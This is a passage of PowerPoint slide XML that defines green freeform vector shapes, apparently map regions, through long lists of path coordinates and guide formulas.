                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="186"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="131" y="30"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="129" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="30"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36123" name="Freeform 256"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2833" y="1898"/>
                <a:ext cx="144" cy="193"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 25 w 144"/>
                  <a:gd name="T1" fmla="*/ 175 h 193"/>
                  <a:gd name="T2" fmla="*/ 29 w 144"/>
                  <a:gd name="T3" fmla="*/ 162 h 193"/>
                  <a:gd name="T4" fmla="*/ 24 w 144"/>
                  <a:gd name="T5" fmla="*/ 150 h 193"/>
                  <a:gd name="T6" fmla="*/ 17 w 144"/>
                  <a:gd name="T7" fmla="*/ 150 h 193"/>
                  <a:gd name="T8" fmla="*/ 8 w 144"/>
                  <a:gd name="T9" fmla="*/ 142 h 193"/>
                  <a:gd name="T10" fmla="*/ 6 w 144"/>
                  <a:gd name="T11" fmla="*/ 132 h 193"/>
                  <a:gd name="T12" fmla="*/ 6 w 144"/>
                  <a:gd name="T13" fmla="*/ 116 h 193"/>
                  <a:gd name="T14" fmla="*/ 1 w 144"/>
                  <a:gd name="T15" fmla="*/ 104 h 193"/>
                  <a:gd name="T16" fmla="*/ 4 w 144"/>
                  <a:gd name="T17" fmla="*/ 100 h 193"/>
                  <a:gd name="T18" fmla="*/ 4 w 144"/>
                  <a:gd name="T19" fmla="*/ 90 h 193"/>
                  <a:gd name="T20" fmla="*/ 3 w 144"/>
                  <a:gd name="T21" fmla="*/ 82 h 193"/>
                  <a:gd name="T22" fmla="*/ 14 w 144"/>
                  <a:gd name="T23" fmla="*/ 79 h 193"/>
                  <a:gd name="T24" fmla="*/ 17 w 144"/>
                  <a:gd name="T25" fmla="*/ 67 h 193"/>
                  <a:gd name="T26" fmla="*/ 14 w 144"/>
                  <a:gd name="T27" fmla="*/ 61 h 193"/>
                  <a:gd name="T28" fmla="*/ 20 w 144"/>
                  <a:gd name="T29" fmla="*/ 48 h 193"/>
                  <a:gd name="T30" fmla="*/ 20 w 144"/>
                  <a:gd name="T31" fmla="*/ 36 h 193"/>
                  <a:gd name="T32" fmla="*/ 33 w 144"/>
                  <a:gd name="T33" fmla="*/ 37 h 193"/>
                  <a:gd name="T34" fmla="*/ 37 w 144"/>
                  <a:gd name="T35" fmla="*/ 43 h 193"/>
                  <a:gd name="T36" fmla="*/ 41 w 144"/>
                  <a:gd name="T37" fmla="*/ 40 h 193"/>
                  <a:gd name="T38" fmla="*/ 51 w 144"/>
                  <a:gd name="T39" fmla="*/ 31 h 193"/>
                  <a:gd name="T40" fmla="*/ 46 w 144"/>
                  <a:gd name="T41" fmla="*/ 24 h 193"/>
                  <a:gd name="T42" fmla="*/ 42 w 144"/>
                  <a:gd name="T43" fmla="*/ 20 h 193"/>
                  <a:gd name="T44" fmla="*/ 45 w 144"/>
                  <a:gd name="T45" fmla="*/ 9 h 193"/>
                  <a:gd name="T46" fmla="*/ 57 w 144"/>
                  <a:gd name="T47" fmla="*/ 0 h 193"/>
                  <a:gd name="T48" fmla="*/ 64 w 144"/>
                  <a:gd name="T49" fmla="*/ 12 h 193"/>
                  <a:gd name="T50" fmla="*/ 68 w 144"/>
                  <a:gd name="T51" fmla="*/ 15 h 193"/>
                  <a:gd name="T52" fmla="*/ 81 w 144"/>
                  <a:gd name="T53" fmla="*/ 17 h 193"/>
                  <a:gd name="T54" fmla="*/ 76 w 144"/>
                  <a:gd name="T55" fmla="*/ 26 h 193"/>
                  <a:gd name="T56" fmla="*/ 87 w 144"/>
                  <a:gd name="T57" fmla="*/ 29 h 193"/>
                  <a:gd name="T58" fmla="*/ 107 w 144"/>
                  <a:gd name="T59" fmla="*/ 17 h 193"/>
                  <a:gd name="T60" fmla="*/ 113 w 144"/>
                  <a:gd name="T61" fmla="*/ 20 h 193"/>
                  <a:gd name="T62" fmla="*/ 124 w 144"/>
                  <a:gd name="T63" fmla="*/ 25 h 193"/>
                  <a:gd name="T64" fmla="*/ 128 w 144"/>
                  <a:gd name="T65" fmla="*/ 34 h 193"/>
                  <a:gd name="T66" fmla="*/ 135 w 144"/>
                  <a:gd name="T67" fmla="*/ 46 h 193"/>
                  <a:gd name="T68" fmla="*/ 133 w 144"/>
                  <a:gd name="T69" fmla="*/ 59 h 193"/>
                  <a:gd name="T70" fmla="*/ 139 w 144"/>
                  <a:gd name="T71" fmla="*/ 72 h 193"/>
                  <a:gd name="T72" fmla="*/ 138 w 144"/>
                  <a:gd name="T73" fmla="*/ 82 h 193"/>
                  <a:gd name="T74" fmla="*/ 142 w 144"/>
                  <a:gd name="T75" fmla="*/ 92 h 193"/>
                  <a:gd name="T76" fmla="*/ 138 w 144"/>
                  <a:gd name="T77" fmla="*/ 106 h 193"/>
                  <a:gd name="T78" fmla="*/ 134 w 144"/>
                  <a:gd name="T79" fmla="*/ 105 h 193"/>
                  <a:gd name="T80" fmla="*/ 126 w 144"/>
                  <a:gd name="T81" fmla="*/ 109 h 193"/>
                  <a:gd name="T82" fmla="*/ 116 w 144"/>
                  <a:gd name="T83" fmla="*/ 112 h 193"/>
                  <a:gd name="T84" fmla="*/ 109 w 144"/>
                  <a:gd name="T85" fmla="*/ 117 h 193"/>
                  <a:gd name="T86" fmla="*/ 100 w 144"/>
                  <a:gd name="T87" fmla="*/ 122 h 193"/>
                  <a:gd name="T88" fmla="*/ 104 w 144"/>
                  <a:gd name="T89" fmla="*/ 131 h 193"/>
                  <a:gd name="T90" fmla="*/ 107 w 144"/>
                  <a:gd name="T91" fmla="*/ 141 h 193"/>
                  <a:gd name="T92" fmla="*/ 119 w 144"/>
                  <a:gd name="T93" fmla="*/ 151 h 193"/>
                  <a:gd name="T94" fmla="*/ 124 w 144"/>
                  <a:gd name="T95" fmla="*/ 154 h 193"/>
                  <a:gd name="T96" fmla="*/ 118 w 144"/>
                  <a:gd name="T97" fmla="*/ 163 h 193"/>
                  <a:gd name="T98" fmla="*/ 108 w 144"/>
                  <a:gd name="T99" fmla="*/ 174 h 193"/>
                  <a:gd name="T100" fmla="*/ 113 w 144"/>
                  <a:gd name="T101" fmla="*/ 185 h 193"/>
                  <a:gd name="T102" fmla="*/ 109 w 144"/>
                  <a:gd name="T103" fmla="*/ 185 h 193"/>
                  <a:gd name="T104" fmla="*/ 99 w 144"/>
                  <a:gd name="T105" fmla="*/ 184 h 193"/>
                  <a:gd name="T106" fmla="*/ 86 w 144"/>
                  <a:gd name="T107" fmla="*/ 188 h 193"/>
                  <a:gd name="T108" fmla="*/ 79 w 144"/>
                  <a:gd name="T109" fmla="*/ 189 h 193"/>
                  <a:gd name="T110" fmla="*/ 71 w 144"/>
                  <a:gd name="T111" fmla="*/ 187 h 193"/>
                  <a:gd name="T112" fmla="*/ 67 w 144"/>
                  <a:gd name="T113" fmla="*/ 191 h 193"/>
                  <a:gd name="T114" fmla="*/ 63 w 144"/>
                  <a:gd name="T115" fmla="*/ 187 h 193"/>
                  <a:gd name="T116" fmla="*/ 57 w 144"/>
                  <a:gd name="T117" fmla="*/ 187 h 193"/>
                  <a:gd name="T118" fmla="*/ 43 w 144"/>
                  <a:gd name="T119" fmla="*/ 183 h 193"/>
                  <a:gd name="T120" fmla="*/ 37 w 144"/>
                  <a:gd name="T121" fmla="*/ 186 h 193"/>
                  <a:gd name="T122" fmla="*/ 27 w 144"/>
                  <a:gd name="T123" fmla="*/ 187 h 193"/>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44"/>
                  <a:gd name="T187" fmla="*/ 0 h 193"/>
                  <a:gd name="T188" fmla="*/ 144 w 144"/>
                  <a:gd name="T189" fmla="*/ 193 h 193"/>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44" h="193">
                    <a:moveTo>
                      <a:pt x="25" y="186"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="24" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="85"/>
                    </a:lnTo>
